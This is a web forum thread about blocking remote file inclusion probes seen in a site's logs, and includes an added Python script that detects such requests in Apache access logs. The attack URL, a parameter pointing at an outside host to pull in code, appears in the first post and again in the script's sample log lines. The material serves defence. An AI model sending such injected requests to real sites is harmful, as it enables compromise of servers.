How to Block attacks "http://213.246.61.125:2082/index.html?" and similar.
Hello there,
Today I've found several attempts to access the following URL on my website: /index.php?file-download=http://213.246.61.125:2082/index.html?

After googling a bit, it seems that in some cases, using this attack, the bad guy is able to change the code in some of your files. It also seems to affect only a certain version of osCommerce. I don't use osCommerce, so I do believe that I'm on the safe side, but it's not the first time that I've seen similar attack attempts on my website.

So, to protect myself, I was wondering if using .htaccess restrictions would be enough? At the moment I'm using the following (which I found on another forum):

Code:
########## Begin - Rewrite rules to block out some common exploits

Any advice on how to protect my website from such attacks and similar ones?

Best regards, Angel. |
Hi, it's very easy to get concerned with possible breaches in your web security.
But warnings and errors in your logs are just that, warnings and errors. If anything is done you will get "failed" messages. Look again and see if that is your problem. Regards, Glenn |
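Added example, not part of any post in this thread: a small Python script that scans Apache access-log lines for requests like the one in the first post, where a query parameter's value is a remote URL, and reports the status code the server returned for each. The combined log format is assumed, and the log lines, the client address and the `example.invalid` host are constructed samples.

```python
import re
from urllib.parse import parse_qsl

# Apache common/combined log format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# A parameter value that is itself an absolute URL is the pattern seen in the first post.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_attempts(lines):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not parsable access-log entries
        client, when, method, target, status = m.groups()
        query = target.partition("?")[2]
        # parse_qsl percent-decodes values, so file=http%3A%2F%2F... is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append({"client": client, "time": when, "param": name,
                             "value": value, "status": int(status)})
    return hits

# Constructed sample lines (dates, sizes and client address are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:15:32 -0500] "GET /index.php?file-download='
    'http://213.246.61.125:2082/index.html? HTTP/1.1" 404 512 "-" "-"',
    '192.0.2.10 - - [01/Jan/2010:10:15:40 -0500] "GET /index.php?page='
    'http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 4096 "-" "-"',
    '192.0.2.20 - - [01/Jan/2010:10:16:02 -0500] "GET /index.php?page=about '
    'HTTP/1.1" 200 2048 "-" "-"',
    'this line is not an access-log entry',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} status={hit["status"]} '
              f'{hit["param"]}={hit["value"]}')
```

A 404 or 403 on a flagged line means the request was refused or found nothing; a 200 only means a page was served, so those entries are the ones to compare against file-integrity checks.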
In addition to what Glenn suggested, you might want to consider some pre-emptive moves. Something like mod_security might not be a bad idea, and you might want to consider some active file monitoring like Aide or Samhain. However, for those to really be useful, you need to trust your current installation completely.
|
Thanks to you both.
I'll follow your recommendations. PS Hangdog42: I have to check, but I think I already enabled "mod_security". Thanks, Angel. |
I've found a fairly good resource on Symantec's website on how to use .htaccess in an efficient way:
http://www.symantec.com/connect/arti...ccess-part-one |
Hi, just another thought, I used tutes similar to and including this Magazine article to get my system ironed out.
Keeping Your Linux System Secure ref. http://www.linux.org/lessons/advanced/x313.html Cheers and all the best, Glenn |